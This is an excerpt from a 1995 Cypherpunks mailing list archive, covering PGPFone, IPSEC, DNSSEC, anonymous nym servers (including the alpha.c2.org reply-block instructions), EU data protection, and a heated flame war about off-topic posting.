>(CELP vocoder, MPEG-audio, lossless encoding, progressive PCM, etc)

The codec used is at the very core of any computer telephony system. A
standard that doesn't specify the codec(s) can be little more than a
standard on message formats, which will be of little value if the other
side doesn't implement the same codec.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 22:09:29 PDT
To: vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d03ac51f1491d1b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:59 8/11/95, Steve Bryan wrote:
>Even without PGPFone I have thought for a while that computer based
>telephony is getting ready to take off. Combining CallerID, customized
>call handling, high quality speakerphone capability and a truly useful
>personal directory (TouchBase Pro is too sluggish, but getting there)
>there were already the ingredients of substantive usefulness. If you can
>add in street maps fetched with an AppleEvent or even a QTVR enhanced map
>then you get something that might make even an AT&T ad envious. Adding
>complete privacy (relative to previous levels available) and possibly
>authentication makes this a very big event.

You will, and the company that will bring it to you...won't be AT&T.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Fri, 11 Aug 95 20:15:06 PDT
To: dneal@usis.com>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.BSI.3.91.950810134314.7478B-100000@usis.com>
Message-ID: <199508120315.XAA14852@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


dneal@usis.com said:
> I'd like to also volunteer to do the linux port, whether it be 
> coordination patches, hacking code, finding people, whatever.

> Also, if other cypherpunk subscribers feel that this topic is 
> inappropriate for the list (not likely) or that it would generate too 
> much traffic for the list (?) I can create a new majordomo list 
> dedicated to the effort in 10 minutes.

The detailed discussions of planning such a port probably are inappropriate 
for cypherpunks.  Lord knows we need to conserve space for Foster conspiracy 
theories.....

I think a seperate list might not be a bad idea.  Either on your server or on 
something like vger.rutgers.edu, which is pretty much the linux mailing center 
of the universe right now. :-)

We should probably also check on comp.os.linux.networking and linux-net@vger.rutgers.edu to make sure someone isn't already working on this.

The ideal author would be outside the US, since the patches would need to be mailed to Linus for inclusion in the kernel, and that brings up some interesting ITAR issues.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Fri, 11 Aug 95 22:36:55 PDT
To: vznuri@netcom.com
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <v02120d06ac515d75289e@[199.2.22.120]>
Message-ID: <lSCLw4NQnoAb083yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



>Of course, if it was a substantial improvement over the
>other "Internet Phone" stuff that's out there, and had
>a good way of dealing with switching, etc., then people
>would use it to make "free" l.d. phone calls on the net,
>and the cryptography would get a free ride.


>Generally, you are right in suggesting that anything that
>requires people to crawl behind their computers, attach
>new cables, purchase and debug a sound card under Windows,
>and generally engage in techno-weenie hardware manipulations
>will have less appeal than something plug and play. Even
>given the extremely user-hostile elements of PGP the software,
>I would be surprised if PGPFone became as popular.

Hmm, oportunities for 'consulting fees' abound in setting up PGP, PGPFone
is another one. ;-)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 12 Aug 95 00:07:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Nym Server Development....
In-Reply-To: <ac515e9d07021004af05@[205.199.118.202]>
Message-ID: <199508120702.AAA25233@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Describe for us what you have in mind for "nym servers" and why they are
> important, then maybe more folks will get involved.
> 

	I beleive that Bryan is referring to nym servers along the
lines of alpha and omega (.c2.org) The omega source isn't publically
available because frankly I'm pretty ashamed of how ugly and nasty the
program is (I wrote it more than a year ago, and my "improvement" in
my perl programming skill shows if you compare that code with code
I've written lately in perl). I'm not sure why the alpha source isn't
available, as it isn't my server. (It runs on my ISP because Matt
Ghio, who runs it, has an account here)

	The alpha and omega servers share the fact that someone can
register a nym anonymously and give the server an
encrypted-reply-block rather than a real email address. This is secure
to the court-order form of attack against the anonymous identity, as
opposed to the penet server, which is not secure against court-order
attack. (There is still very much work that needs to be done towards
defeating replay & traffic analysis attacks on anonymous forwarders on
the server)


-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 11 Aug 95 16:35:37 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508112335.BAA00874@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by sbryan@maroon.tc.umn.edu (Steve Bryan) on 
Fri, 11 Aug  3:59 PM

>A lot of people who 
>don't usually think or talk about fundamental issues 
>of privacy and technology will be doing so next week.


PRZ is due to receive a prestigious design award for PGP this 
month, which may give a boost to public awareness of crypto's 
value for privacy.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 12 Aug 95 00:51:24 PDT
To: Ford Prefect <remailer@bi-node.zerberus.de>
Subject: Re: your mail
In-Reply-To: <m0sgh1i-00029BC@bi-node.zerberus.de>
Message-ID: <Pine.3.89.9508120103.A2501-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Aug 1995, Ford Prefect wrote:

> perry, of course, is a dysfunctional human "cipher" himself,

I always thought he was an AI program that someone put in a lot of 
abusive crap to be funny - then someone accidentally let it loose on the 
net ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 12 Aug 95 00:56:15 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: F*** FOSTER
In-Reply-To: <199508102345.BAA14099@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9508120138.B2501-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


Oh, who gives a rat's ass?  Just hit 'd' and be done with it...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 12 Aug 95 01:59:17 PDT
To: Derek Bell <dbell@maths.tcd.ie>
Subject: Re: EU Data Protection
Message-ID: <199508120857.BAA11353@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 7:13 PM 8/11/95, Derek Bell wrote:
>>        I think you miss an important point; your opinion is subjective, but
>>data can relate to objective facts (e.g. credit records). Would you take the
>>same stance if a credit bureau claimed that you couldn't pay back half the
>>loans you took out?

There's a difference between what information you maintain for internal purposes
and what information you give to other people.  I don't really _care_ what
nonsense
a credit bureau may have in their internal records, only what they tell
other people
about me.  If they somehow think I'm a bankrupt Communist space alien, but
tell their
credit-rating customers that my credit looks ok, it's not my business.  
If they use their own internal records to decide that _they_ don't want to
lend me money,
well, somebody else will get my business; it's in their interest to be accurate.

A more interesting question is whether reporting credit transactions in private
communications with their data customers constitutes libel if they inaccurately
say bad things about me, and do I have a right to force them to tell me.
Tim May thinks this kind of forced speech violates the US Constitution;
I'm less bothered by laws telling corporations what to do (since corporations
are fictional creations of the state) than by laws telling human-owned
businesses
or individual humans what to do.

Tim May replies:
>Think about it: the name "data privacy" sounds good, at first blush, but
>what it really means is that my records are not private, that my records
>are inspectable by government agents to see if I have stored any illegal
>facts or correlations.

Yeah.  If you register your computer and its data with the Data Police,
they have the right to inspect it.  If you _don't register, that gives
them reasonable suspicion to believe that you might have "illegally
unregistered data" on the machine, so they have the power to inspect it.
Kind of like proving you're not a witch....
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 12 Aug 95 01:59:55 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508120857.BAA11361@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 8/11/95 -0700, you wrote:
>the requirements for live voice encryption are pretty significant:
>a fast computer and fast modem. this alone is only a subset
>of those people using PGP right now. 

The tradeoffs are speech encoding quality, and we basically crossed that
line a year or two ago for the high end, and are heading toward mass capability.
9600 baud high-quality speech takes lots of crunching, 13.3 kbps GSM takes
a Sparc 2 or maybe a Pentium, 16 kbps ADPCM is dirt trivial and can probably
run on an 8086.  The coding options with Nautilus run on 386s.
And you can get by with less if you're willing to put up with half-duplex.

Yes, lots of us aren't using modems faster than 14400 now, but you can get a 
14.4/19.2 modem at Fry's for well under $100.  (19.2 is unfortunately
not quite enough to 16 kbps, given start and stop bits, unless you do
synchronous
or start playing with V.42 a bit, but it's close.  Sound cards are down in
the $50 range,
and give you the analog/digital conversion as well as some computation.
Adding a sound card is a bit of work, given the wonderful operating systems
on many PCs :-), but folks put them in along with CDROMs so they can run
all the latest multimedia applications, or high-end versions of DOOM.

Anybody who needs to avoid government or business-competitor eavesdroppers
can probably
afford $150 in extra hardware for their PC.

This doesn't apply to international communications or folks in the boonies,
where it's hard to get full performance out of modems, so you Commie
spies and Earth First!ers will need more expensive high-tech equipment :-)...
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Fri, 11 Aug 95 23:53:29 PDT
To: feanor@anduin.gondolin.org (Bryan Strawser)
Subject: Re: your mail
In-Reply-To: <199508120242.VAA00212@anduin.gondolin.org>
Message-ID: <199508120653.CAA03702@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Bryan Strawser:
: 
: 
: What John is attempting to do is have a nymserver like anon.penet.fi,
: where folks can create an alias and send/recieve mail/postings to it.  
: However, unlike Julf's system, a secure nymserver would prevent the owner 
: from being able to divulge who the real-life person is behind the
: alias because of the PGP encrypted reply block and other options
: involved.
: 

But how does one ensure that no logs are kept on the server, and how
does the encrypted reply block work (I can't see how this will shield
identity from both of the communicating parties)?

- -----
#include <std_disclaimer.h>

Mark Rogaski           100,000 lemmings     rogaski@phobos.lib.iup.edu 
aka Doc, wendigo        can't be wrong!     http://www.lib.iup.edu/~rogaski/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCxP1x0c4/pqJauBAQFvhAP+OibktWOj8RPdOhDF88Zse84S+AuUnCMv
jLbvJ7q6cJELtZ6cXkv24iVLRPD+EyTkZ6V4BWEPhXDpeKtYhcZf0fdRyM2QCdpR
kNvygkCgrMiynaDQZqkeWzucj54wmZ5U1s9+wH6hcdp5E17+AnZDPrtit6OENwFw
87dLMAHPmf4=
=EQGr
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 12 Aug 95 01:24:15 PDT
To: cypherpunks@toad.com
Subject: PERRY-GRAMS (Does Perry speak for Cypherpunks?)
Message-ID: <199508121046.FAA06728@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                      PERRY-GRAMS
            (Does Perry speak for Cypherpunks?)


   I have a solution to the Perry off-topic problem: PERRY-GRAMS.

   I got this idea from the following text of Tim May's:.

----------------- start Tim May text ---------------------------------
Perry is Perry. He has certainly written his share of rants and "off-topic"
posts, as have we all. Literally thousands of his posts over the past 3
years reside on my disk drives, and certainly until recently most of them
were not about writing code.
--------------------end Tim May text ---------------------------------


   Firstly, what is a Perry-Gram?

1. Find a long Cypherpunk post by Perry that is in your opinion,
     "off-topic". Keep the header.

2. Add the full post of Perry's "Ciphergroupies" post which I have
   thoughtfully included at the end of this post. Include header.

3. Add text asking Perry to defend his off-topic post as appropriate to
     Cypherpunks.

   For true effectiveness, you really need to post several Perry-Grams
 per provocation.

   To be really effective, Cypherpunk "Ciphergroupies" will need to
do a little networking. Most don't have much in the way of Cypherpunk
archives - but some do. If you want to make some Perry-Grams but lack
the archives, then post a call to Cypherpunks to have someone with
archives to send you as many long, "off-topic" posts by Perry as they
can. With a little cooperation, we can build up a data base of Perry
"off-topic" posts. Unfortunately, my Cypherpunk archives were lost,
so I won't be much help. - I am at a loss for Perry's words. However,
a lot of Cypherpunks keep lots of old posts. I am willing to store at
least one 1.44 meg diskette of Perry-Grams in compressed .zip format.
Trade them like baseball cards. Of course, with computers, that's
sharing :-).

   If you're having problems getting people with archives to help you,
then contact Tim May. I suspect that Tim (Bless his Generosity) will be
willing to dig up some potential Perry-Grams material for you.

   Treasure your Perry-Grams. They are not merely for the current Perry
threads. If you save them, then you can whip them out in the future when
Perry does more of his nasty, hateful "off-topic" attacks. I recommend
Perry-Gram diskettes. I think this is the best way to bell the Perry-
cat. Let Perry deny his own words! :-) :-) :-)

Crypto relevance: Cypherpunks cannot be well described as just a list for
techno freaks who love Crypto. I believe that most of the heavy crypto
coders & theorists would be just as happy to be working on AI, linkers,
natural language parsers, etc.. - were it not for POLITICAL CONSID-
ERATIONS! I think most of the active people on Cypherpunks despise
central political control & are active in order to stop it. Cypherpunks
is motivationally driven by this political consideration. Perry did not
spend $50k & "spend months of [his] life struggling to..." just because
he thinks that computer crypto is "RAD KOOL".

   Then why drive out our polemists & our conspiracy buffs? Conspiracy
theory is the theory of the working of states by non-establishment
writers. Our political writers are "crying fire" when "danger of
fire" is evident to them. They MUST give out the alarm. Most people
are ignorant of the degree of danger that we are in from the power-
mad illigitmate United States "Federal" State. Thank God for
"extremist right-wing kooks" who do conspiracy writing. They may yet
save us from establishment "left-wing Liberal kooks" who seem desperate
to bankrupt us & turn America into a police state. Not that the
Republicans are much better. They seem to be on a mission to cut
Democratic spending by 5%. -  As the Russians say "Prophylactic
politics." - When there is public discontent with the elite's policies,
give the people an insincere group of politicians to cater to the public's
grievances.

-------- start of Perry E. Metzger "Ciphergroupie" post ----------
Received: from toad.com by relay3.UU.NET with SMTP
	id QQzcct17133; Wed, 9 Aug 1995 21:53:27 -0400
Received: by toad.com id AA08720; Wed, 9 Aug 95 18:35:44 PDT
Received: from panix4.panix.com by toad.com id AA08714; Wed, 9 Aug 95 
18:35:40 PDT
Received: from panix2.panix.com (panix2.panix.com [198.7.0.3]) by 
panix4.panix.com (8.6.12/8.6.12+PanixU1.1) with SMTP id VAA03975; Wed, 9 Aug 
1995 21:34:13 -0400
Message-Id: <199508100134.VAA03975@panix4.panix.com>
To: KALLISTE@delphi.com
Cc: cypherpunks@toad.com
Subject: Re: Only 1/3 of Government Computers Down So Far
In-Reply-To: Your message of "Wed, 09 Aug 1995 12:29:59 EDT."
             <01HTVAYUCH6W90PB08@delphi.com>
Reply-To: perry@piermont.com
X-Reposting-Policy: redistribute only with permission
Date: Wed, 09 Aug 1995 21:34:12 -0400
From: "Perry E. Metzger" <perry@panix.com>
Sender: owner-cypherpunks@toad.com
Precedence: bulk


KALLISTE@delphi.com writes:
> 	Many people are interested in cryptology because they don't
> want the NSA (among others) invading their privacy.

So, the question is this: do people want to follow the standard "ooh,
lets shudder at the conspiracy theories" track, and fall flat on their
faces, or do they want to see cryptography implemented and widely
deployed?

The noise levels on this list have driven most of the important crypto
types off it. People like Phil Karn and Steve Bellovin, who actually
implement stuff, aren't here any more. Instead, we have a vast flood
of ciphergroupies who love to post the latest funny bit they found on
the net, discuss whether David Koresh was being unfairly persecuted,
and how many bits of toe lint they found last week.

What we used to have was the cafe where the politically motivated
cryptographers hung out and gossiped. Now we have an open sewer in
which the occassional pearl still floats, and the cryptographers are
mostly gone.

Those of us who want to discuss cryptography here have been displaced.
If your goal is to impede communication about cryptography, you've
admirably succeeded. You've cut off one more place where people were
discussing how to deploy real-world solutions.

Tim May is wrong. I don't care what you call a "cypherpunk" -- thats
your business. However, the useful people *are* the people who write
code, spend long hours working to get standards implemented, work
lobbying in Congress, etc. Those of you who just rant, like Tim, were
very useful two years ago, but its getting rather thin listening to
you guys make it impossible to discuss real work while you blather.
(Sorry, Tim. However, as long as you are going to call me "abusive" I
might as well speak my mind. If you are going to do the time, might as
well do the crime.)

> The Foster story concerns the chief NSA privacy-invasion of modern
> times: spying on domestic banking transactions.  So it's relevant.

Actually, what you've been posting has been even below the standards
of journalistic integrity (i.e. few) that you find on a Pacifica radio
station.

I don't even care if all the conspiracies are real. Isn't what is out
in the open enough? If the invasions of privacy that the government
acknowledges and the crap like Clipper that they try to foist on us
isn't horrifying enough, what weak-assed conspiracy theory that
someone came up with while tripping is going to do it for you.
Reality is frightening enough. FINCEN is real. The NSA really spied on
people at least until the congressional hearings in the '70s. The
government really invades privacy every day. Why do I need crap?

> 	The Grand Inquisitor role is getting a little old.  So if
> you want to continue to play it, my response is:  Fuck Off.
>
> -Orlin

Frankly, Orlin, I think you are, with respect to the goals we are
trying to advance here, a useless lump of flesh. I've spent about
$50,000 of my own money trying to make the internet safe for
root-eaters like yourself. I've spent months of my life struggling to
get RFCs out, and I'm spending most of this month locked in my
apartment writing code. Right now, we are coordinating an effort to
try to get get IPSEC widely implemented in the next several months and
deployed by spring. What do you do, exactly, other than generate chaff
to make it impossible for any real work to be seen on the radar?

When people bring up real work, like cryptographic libraries or Wei's
stuff or the work I've been doing in the IETF and that sort of thing
people like Matt Blaze notice, and maybe Ray Cromwell and Hal Finney
(cypherpunks both, not ciphergroupies) try to discuss things, but the
folks like you basically drown everything out by making more noise
about random conspiracy garbage.

Frankly, if anyone is helping the NSA, its you. They don't want to see
universally deployed crypto. You could be out trying to spread
cryptography by coding, by handing people crypto when they need it, or
any one of dozens of other things. Instead, what you are doing is
making it impossible for people to try to get work done.

I have no idea what you are like personally. Maybe you're a nice,
smart guy. Maybe you are really a useful person in your other life.
However, I don't think your posting more conspiracy tracts is
improving life as we know it.  You have become an impediment -- a lump
of rock in the highway. You aren't part of the solution -- you are
part of the problem.

Perry
----------------end Perry E. Metzger "Ciphergroupie" post --------------

                                         PUSH EM BACK! PUSH EM BACK!
                                         WWWAAAYYYY  BBBAAACCCK!
                                         BBBEEEAAATTTT  STATE!

                                         Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Aug 95 04:42:56 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: EU Data Protection
In-Reply-To: <ac51018d04021004d19c@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950812074013.336B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 11 Aug 1995, Timothy C. May wrote:

> Think about it: the name "data privacy" sounds good, at first blush, but
> what it really means is that my records are not private, that my records
> are inspectable by government agents to see if I have stored any illegal
> facts or correlations.
> 

In addition to registering records and making all records "public 
records" in some sense, data potection acts also require the registration 
of *computers.*

DCF

"Register commies not computers."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 12 Aug 95 04:58:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Nym server development....
Message-ID: <9508121158.AA20379@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


This seems as good a time as any to forward the full text of this to the
list. At worst, Alpha is a solid proof-of-concept of a possible "nym server"
model. IMHO it's actually much better than that.

I strongly recommend reading the below before asking basic questions about 
the workings of Alpha....

-Futplex <futplex@pseudonym.com>

Forwarded message:
> Date: Sat, 12 Aug 1995 04:41:01 -0700
> X-Last-Updated-Date: Jan 9 1995
> From: help@alpha.c2.org (Automated reply)
> Subject: Info on anonymous account service @alpha.c2.org
> Reply-To: admin@alpha.c2.org
> 
> This mail message was sent automatically in response to the message you
> sent to help@alpha.c2.org
> 
> This system allows you to create a pseudonymous address of the format
> username@alpha.c2.org.  For security, all messages are encrypted with PGP.
> 
> To create a mail alias, first create an encrypted reply-block for a
> cypherpunk-style remailer.  An encrypted reply block is a message
> encrypted with a remailer's PGP public key, which will be sent to
> your address, or to an address where you can receive messages.
> 
> To create a reply block, you would create a message for a remailer that
> goes back to you:
> 
>  ::
>  Request-Remailing-To: you@yoursite.org
> 
> Then you would encrypt that with a remailer's public key, and prepend
> the necessary Encrypted: PGP header.  When this message is received by
> a remailer, it would decrypt it and send it to you.  It would also send
> you any text appended to the end (outside the PGP wrapper).  Thus, using
> a reply block, it is possible for people to send you mail without knowing
> your real address.
> 
> Next, choose a pseudonym and a password.  The pseudonym-address may contain
> any alphabetical or numeric characters, or hyphens.  The password may not
> contain any spaces.  Then create a message of the following format:
> 
>  From: yourname@alpha.c2.org
>  New-Password: Your_Password
>  Reply-Block:
>  ::
>  Anon-To: remailer@xs4all.nl
> 
>  ::
>  Encrypted: PGP
> 
>  -----BEGIN PGP MESSAGE-----
>  Version: 2.3a
> 
>  hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
>  /S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
>  OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
>  AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
>  cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
>  vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw==
>  =Bla3
>  -----END PGP MESSAGE-----
> 
> Do not actually indent it; that's just for example purposes.
> Encrypt this with the following public key and mail it to
> alias@alpha.c2.org.  Unencrypted mail sent to this address
> will be deleted automatically.  If everything is correct, your
> mail alias will be created, and you will be sent a confirmation.
> If not, there will be no way for the software to reply to you,
> so the message will be deleted.  If you don't receive anything,
> something is wrong, so try again.  Be sure to test the reply
> block first, so that you will know it works!  Also, don't forget
> to include the address of the remailer, and the Encrypted: PGP
> header at the beginning of your reply block.
> 
> Here is the public key:
> 
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6
> 
> mQCNAi7K8rQAAAEEAMiK09Nd+NfaL4Q14bKT0Ivdj3MdbCjAG6Cs5ULYBS1ZWSLA
> KiHsm0+kPNHqBVOufN7FT2iK0Mbuyk+dZgHG6ScicDkImysRkmso7eh5c9mU9V8K
> M0+ImKJyOwgVLEgyRK5e4h2XHpwSTtpx3zZpk4CsexLGCQNXF+ikm236U0rNAAUR
> tCpQc2V1ZG9ueW1vdXMgUmVtYWlsZXIgPGFsaWFzQGFscGhhLmMyLm9yZz4=
> =xmQf
> -----END PGP PUBLIC KEY BLOCK-----
> 
> 
> When mail comes in for your address at alpha.c2.org, it will be
> encrypted with Your_Password, using pgp -cta, appended to the reply
> block and sent to remailer@alpha.c2.org.  Be sure that you have
> the Encrypted: PGP header, and the address of the next remailer
> it is to be sent to!  All messages are held and sent out in random
> order once an hour.
> 
> If you later wish to change your password, send an encrypted message to
> alias@alpha.c2.org containing a From: line with your nickname, a
> Password: line with your current password, and a New-Password: line
> containing your new password.  If the old password is correct, the
> password will be changed to the new one.  For example:
> 
>  From: Dan_Quayle
>  Password: Bush
>  New-Password: Clinton
> 
> You can also include a new Reply-Block.
> 
> A mail alias can be deleted at any time by setting the password to nothing.
> (Send a password change request with nothing following the 'New-Password:')
> 
> 
> Sending messages
> 
> Once you have created a working address, you can send mail from that address.
> Simply create a message with standard mail headers, and add your password
> in a Password header.
> 
>  From: jdoe@alpha.c2.org (John Doe)
>  Password: foobar
>  To: alt.anonymous@demon.co.uk
>  Subject: hello world
> 
>  This is my message.
> 
> The message would be delivered as shown, minus the Password: header.
> If the password is not correct, the message is discarded.
> 
> 
> Troubleshooting
> 
> Here are some common problems.  If you're having trouble, check the
> following list:
> 
>  - Be sure to use -t option with PGP
>  - Test your reply block and be sure it works!
>  - If you are having trouble creating a certain address, perhaps
>    you already created it, but used the wrong reply block
>    or a different password.
>  - Usenet posts require a Subject: header.
>  - Messages to alias@alpha.c2.org must be encrypted with PGP
>    Be sure you use the correct PGP key; remailer@alpha.c2.org
>    has a different one.
> 
> 
> Problems may be reported to admin@alpha.c2.org
> 
> For more information about Community ConneXion,
>  telnet to c2.org and login as guest, or if you have a WWW browser:
>  http://www.c2.org/
> 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 12 Aug 95 05:35:08 PDT
To: trei@process.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <9508111351.AA04381@toad.com>
Message-ID: <199508121234.IAA03887@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> Don Eastlake has actually done a draft RFC on
> using the DNS for key distribution.

Its more than a draft -- at this point it is very clearly standards
track. Note that the document in question only covers security for the
DNS itself, but the side effect is that you've built all the
mechanisms you need for general key distribution. Don is now working
on the certificate formats.

> It may be found at 
> 
> ftp://ietf.cnri.reston.va.us/internet-drafts/draft-ietf-dnssec-secext-04.txt
> 
> He briefed the W3C security working group about
> this recently, and a number of people raised objections, notably
> 
> * database bloat
> * zone transfer bloat
> * increased hits on root servers due to a new class of inquiry.

As I've noted, given the actual in-field experience of Hesiod, I'm not
in the least worried.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 06:23:03 PDT
To: cypherpunks@toad.com
Subject: YOM_ama
Message-ID: <199508121322.JAA13154@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. Sunday NYPaper:


   "Bigger Than the Family, Smaller Than the State: Are
   voluntary groups what make countries work?" [Book review]

      Mr. Fukuyama has shifted his attention from the state to
      society; the result is a fascinating and frustrating
      book, "Trust: The Social Virtues and the Creation of
      Prosperity." We have settled on the structure of the
      state, he writes, but "liberal political and economic
      institutions depend on a healthy and dynamic civil
      society for their vitality."

      In the world of ideas, civil society is hot. It is
      almost impossible to read an article on foreign or
      domestic politics without coming across some mention of
      the concept. And "civil society" has bipartisan appeal;
      from Hillary Rodham Clinton to Pat Buchanan, politicians
      of all stripes routinely sing its praises.

      Behind much of the new interest in civil society, on the
      part of communitarians as well as social conservatives,
      is the idea that culture and society shape the nature of
      government. But the space between the realm of
      government and that of the family can be filled with all
      kinds of associations, liberal and illiberal. Historians
      have amply laid out how the Nazi Party made its first
      inroads through infiltrating local groups. On a less
      extreme note, many of the small groups that have formed
      in America over the last two decades have been
      thoroughly illiberal in spirit: victims' groups that
      have discouraged individual responsibility, minority
      clubs that have Balkanized the campus and the workplace,
      pseudoreligious cults with violent agendas. Not all of
      civil society is civic minded.

      A report on Timothy J. McVeigh's civil life noted that
      Mr. McVeigh and Terry and James Nichols, would go
      bowling and plan their future. But perhaps we would all
      have been better off if Mr. McVeigh had gone bowling
      alone.


   YOM_ama (about 14K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 12 Aug 95 09:42:30 PDT
To: cypherpunks@toad.com
Subject: Significance of PGPFone?
Message-ID: <ac522139000210046274@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Steve Bryan asks about the potential significance of the new PGPFone:

At 8:59 PM 8/11/95, Steve Bryan wrote:

>Am I the one of the few who thinks that PGPFone is the biggest CypherPunk
>event for years? I think it will be even more significant if we get strong
>encryption

Hard to say how significant it is. Some points:

* Nautilus has been out for a while....after a splash of publicity when it
appeared, not much has been heard recently.

* E-mail and the Net are fundamentally different from voice communication.
Encrypting or signing messages in text form is different from encrypting
voice communications between two parties. (The eventual large use of
encryption is likely to be driven by digital payment schemes, proof of
signed contracts, etc. In other words, non-voice applications.)

* Wiretapping of voice communications is fundamentally a different sort of
problem than interecepting cleartext of e-mail and Net interactions. This
is a point Whit Diffie makes cogently, that it's much easier for
packet-sniffers to automate surveillance at the touch of a key than it is
to order audio lines to be tapped. (Quibblers may cite increasing
automation, causing some convergence, but the point remains that voice
conversations must still be recorded, listened to, etc., whereas computer
text messages may be more easily analyzed.)

* Most of my voice communications are with nearby folks, for various
